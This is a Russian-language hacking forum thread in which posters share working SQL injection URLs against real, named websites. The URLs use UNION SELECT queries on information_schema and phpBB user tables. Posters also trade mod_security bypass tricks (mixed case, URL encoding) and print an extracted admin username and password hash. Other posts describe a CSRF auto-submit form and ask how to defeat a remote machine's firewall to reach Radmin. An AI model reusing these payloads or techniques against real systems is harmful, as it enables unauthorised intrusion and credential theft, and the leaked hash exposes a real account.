Поставь снифер приблуду которая отслеживает http-заголовки при нажатии на кнопку "Начать поиск" или "Поиск" или как она там называется. Да, очень часть в целях безопасности визуально стали скрывать передающиеся параметры, но это не значит, что их там нет. Есть для FF такая штука, называется LiveHTTPHeaders, иногда очень полезная бывает
Ребят такой вопрос.Можно ли как то открыть порт радмина на другом компе? Радмин там запущен,а фаер не пускает.Адрес даже не пингуется.Все действие происходит в локальной сети. Стоял касперский на том компе и нод - один фиг.В касперском выставлял разрещение на Remote desctop а толку ноль. Может есть какие штуки которые вырубят бдительность фаера?
Передаються методом POST данные значит. Напрямую не получиться заюзать. Сможешь сделать на своем сайте html форму там параметр action формы будет уязвимый скрипт. И прицепить автоотправку формы - если на уязвимом сайте не проверяется реферрер - то круто...
+union+select+1,2,version(),4,5,6,7+--+ 5.0.77-community-log- ??????????????????????????? что делать если запрос +union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+--+ не проходит, просто пишет Code: Not Acceptable An appropriate representation of the requested resource /text_press_year.php could not be found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. +union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+--+ проходит , но не одну колонку не выдает
а польщователю что тогда подсовывать ? ссылку на "свой сайт", а от тудова уже будет делать редирект обратно на тот с которого он сцылку заюзал. я правильно понял ?
mod_security абсалютно пофигу на регистр символов, хоть так напиши TaBlE_nAmE хоть так tAbLe_nAmE, а вот так может пройти %54able_name
http://www.opennet.ru/base/sec/mod_security2.txt.html, я тебе не про сам скрипт говорю, а про модуль апача.
2 PaCo Не прокатывает: http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables--+ Прокатывает: http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,TaBle_naMe,4,5,6,7+from+inForMatiOn_sCheMa.taBLes--+ Кстати возможно я угадал с сайтом ^^
Да, с сайтом угадал.. Прокатывает и просто: http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+information_schema.Tables--+
да я кокраз его крутил тоже(он один и вылазиет с гугл text_press_year.php), значит так настроен mod_security
еще по XSS. 1) есть наиболее удачные сканеры XSS, только чтонибуть актуальное а не 3 летней выдержки. 2) такие сканеры могут сканить только поссивные XSS ?? Есть ли сканеры активных XSS, если есть то как они работают ?
Народ, помогите насчет скули! И было бы не плохо если бы еще и объяснили почему так... HTML: http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,2,3,4,5,6,7+from+bertie.phpbb_users-- Скуля 5 колонки : phpbb_usersbertieusername, phpbb_usersbertieuser_password - существуют, а ничего не выводится Пробывал связки cast(****+as+binary), convert(****+using+latin1), unhex(hex(*****)) и ничего, все то же самое...
http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_name=0x70687062625F7573657273-- http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7+from+bertie.phpbb_users-- думаю требуется это: admin:$H$9LZ00OBCgmEv2A6/.0VbvqUiJUeNE60
тьху, спс, протупил... просто забыл поставить разделитель 0x3a к примеру, а то все слилось у меня и shema и table и column